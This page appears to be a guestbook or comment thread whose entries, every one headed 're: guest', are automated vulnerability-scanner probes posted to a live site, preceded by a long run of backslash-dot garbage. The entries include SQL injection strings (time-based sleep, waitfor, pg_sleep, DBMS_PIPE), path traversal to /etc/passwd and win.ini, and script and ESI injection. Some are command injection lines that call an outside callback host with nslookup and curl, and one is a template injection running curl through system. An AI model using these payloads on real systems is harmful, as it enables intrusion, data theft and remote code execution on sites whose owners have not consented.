.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
WEB-INF\web.xml
re: guest
1
re: guest
1
re: guest
-1 OR 2+162-162-1=0+0+0+1 --
re: guest
-1 OR 3+162-162-1=0+0+0+1 --
re: guest
-1 OR 2+502-502-1=0+0+0+1
re: guest
-1 OR 3+502-502-1=0+0+0+1
re: guest
-1' OR 2+544-544-1=0+0+0+1 --
re: guest
-1' OR 3+544-544-1=0+0+0+1 --
re: guest
-1' OR 2+733-733-1=0+0+0+1 or 'u3DI8Wd5'='
re: guest
-1' OR 3+733-733-1=0+0+0+1 or 'u3DI8Wd5'='
re: guest
-1" OR 2+909-909-1=0+0+0+1 --
re: guest
-1" OR 3+909-909-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
cyOVn3EP'; waitfor delay '0:0:15' --
re: guest
-5 OR 231=(SELECT 231 FROM PG_SLEEP(15))--
re: guest
-5) OR 617=(SELECT 617 FROM PG_SLEEP(15))--
re: guest
-1)) OR 904=(SELECT 904 FROM PG_SLEEP(15))--
re: guest
svqw6mdC' OR 285=(SELECT 285 FROM PG_SLEEP(15))--
re: guest
wHqkIzVB') OR 576=(SELECT 576 FROM PG_SLEEP(15))--
re: guest
4YLd01JD')) OR 857=(SELECT 857 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@vgNmA
re: guest
1D7A8XHRH0
re: guest
response.write(9817768*9461782)
re: guest
'+response.write(9817768*9461782)+'
re: guest
"+response.write(9817768*9461782)+"
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
${9999890+9999177}
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
../
re: guest
)
re: guest
!(()&&!|*|*|
re: guest
redirtest.acx
re: guest
^(#$!@#$)(()))******
re: guest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: guest
'.gethostbyname(lc('hitum'.'xshorobb4f228.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(82).chr(113).chr(70).'
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: guest
".gethostbyname(lc("hitcj"."agtxvufo5693c.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(75).chr(119).chr(66)."
re: guest
/etc/shells
re: guest
gethostbyname(lc('hittb'.'vaewtbys6c46d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(68).chr(101).chr(80)
re: guest
../../../../../../../../../../../../../../etc/shells
re: guest
c:/windows/win.ini
re: guest
echo mdsfag$()\ saahmt\nz^xyu||a #' &echo mdsfag$()\ saahmt\nz^xyu||a #|" &echo mdsfag$()\ saahmt\nz^xyu||a #
re: guest
bxss.me
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
&echo cfoqau$()\ ykggcy\nz^xyu||a #' &echo cfoqau$()\ ykggcy\nz^xyu||a #|" &echo cfoqau$()\ ykggcy\nz^xyu||a #
re: guest
bxss.me/t/xss.html?%00
re: guest
Http://bxss.me/t/fit.txt
re: guest
|echo zekjhk$()\ chijrs\nz^xyu||a #' |echo zekjhk$()\ chijrs\nz^xyu||a #|" |echo zekjhk$()\ chijrs\nz^xyu||a #
re: guest
http://bxss.me/t/fit.txt?.jpg
re: guest
expr 9000428145 - 917190
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
"+"A".concat(70-3).concat(22*4).concat(111).concat(83).concat(98).concat(69)+(require"socket"
Socket.gethostbyname("hitsj"+"zkspqzhs8941d.bxss.me.")[3].to_s)+"
re: guest
(nslookup -q=cname hitoskfjdvvoy9b274.bxss.me||curl hitoskfjdvvoy9b274.bxss.me))
re: guest
';print(md5(31337));$a='
re: guest
'+'A'.concat(70-3).concat(22*4).concat(113).concat(88).concat(111).concat(75)+(require'socket'
Socket.gethostbyname('hitrb'+'gawrjcwk36361.bxss.me.')[3].to_s)+'
re: guest
";print(md5(31337));$a="
re: guest
$(nslookup -q=cname hitgdxouqapmp5efe5.bxss.me||curl hitgdxouqapmp5efe5.bxss.me)
re: guest
'A'.concat(70-3).concat(22*4).concat(101).concat(85).concat(116).concat(67)+(require'socket'
Socket.gethostbyname('hitdi'+'pnwlzrif4cd8b.bxss.me.')[3].to_s)
re: guest
${@print(md5(31337))}
re: guest
&nslookup -q=cname hitrpqyjvwjkc02476.bxss.me&'\"`0&nslookup -q=cname hitrpqyjvwjkc02476.bxss.me&`'
re: guest
'"()
re: guest
${@print(md5(31337))}\
re: guest
&(nslookup -q=cname hitoaimdioslu7e4d3.bxss.me||curl hitoaimdioslu7e4d3.bxss.me)&'\"`0&(nslookup -q=cname hitoaimdioslu7e4d3.bxss.me||curl hitoaimdioslu7e4d3.bxss.me)&`'
re: guest
'&&sleep(27*1000)*oiryey&&'
re: guest
replies
re: guest
'.print(md5(31337)).'
re: guest
|(nslookup -q=cname hitvdhzcqqapxbdb69.bxss.me||curl hitvdhzcqqapxbdb69.bxss.me)
re: guest
'"
re: guest
"&&sleep(27*1000)*njezdl&&"
re: guest
replies�
re: guest
`(nslookup -q=cname hitzhyahazsbne2b6d.bxss.me||curl hitzhyahazsbne2b6d.bxss.me)`
re: guest
<!--
re: guest
'||sleep(27*1000)*srliut||'
re: guest
;(nslookup -q=cname hitbnemngsscn3e7b9.bxss.me||curl hitbnemngsscn3e7b9.bxss.me)|(nslookup -q=cname hitbnemngsscn3e7b9.bxss.me||curl hitbnemngsscn3e7b9.bxss.me)&(nslookup -q=cname hitbnemngsscn3e7b9.bxss.me||curl hitbnemngsscn3e7b9.bxss.me)
re: guest
replies/.
re: guest
"||sleep(27*1000)*bkmvem||"
re: guest
|(nslookup${IFS}-q${IFS}cname${IFS}hitiszectkwya827b7.bxss.me||curl${IFS}hitiszectkwya827b7.bxss.me)
re: guest
&(nslookup${IFS}-q${IFS}cname${IFS}hitvrhouerirqfe539.bxss.me||curl${IFS}hitvrhouerirqfe539.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitvrhouerirqfe539.bxss.me||curl${IFS}hitvrhouerirqfe539.bxss.me)&`'
re: guest
'"()&%<zzz><ScRiPt >1AHF(9936)</ScRiPt>
re: guest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hithpvoudbsss53b3b.bxss.me")}}
re: guest
'"()&%<zzz><ScRiPt >1AHF(9324)</ScRiPt>
re: guest
9111469
re: guest
TemzhXmw
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
-1 OR 5*5=25 --
re: guest
-1 OR 5*5=26 --
re: guest
-1 OR 5*5=25
re: guest
-1 OR 5*5=26
re: guest
*if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
-1 waitfor delay '0:0:15' --
re: guest
CwDIIDwd'; waitfor delay '0:0:15' --
re: guest
-1 OR 327=(SELECT 327 FROM PG_SLEEP(15))--
re: guest
-1) OR 12=(SELECT 12 FROM PG_SLEEP(15))--
re: guest
-1)) OR 339=(SELECT 339 FROM PG_SLEEP(15))--
re: guest
QDHl1YSa' OR 189=(SELECT 189 FROM PG_SLEEP(15))--
re: guest
OECJTq9k') OR 188=(SELECT 188 FROM PG_SLEEP(15))--
re: guest
Bhj9Us07')) OR 347=(SELECT 347 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
'"
re: guest
@@LeFRj
re: guest
(select 198766*667891)
re: guest
(select 198766*667891 from DUAL)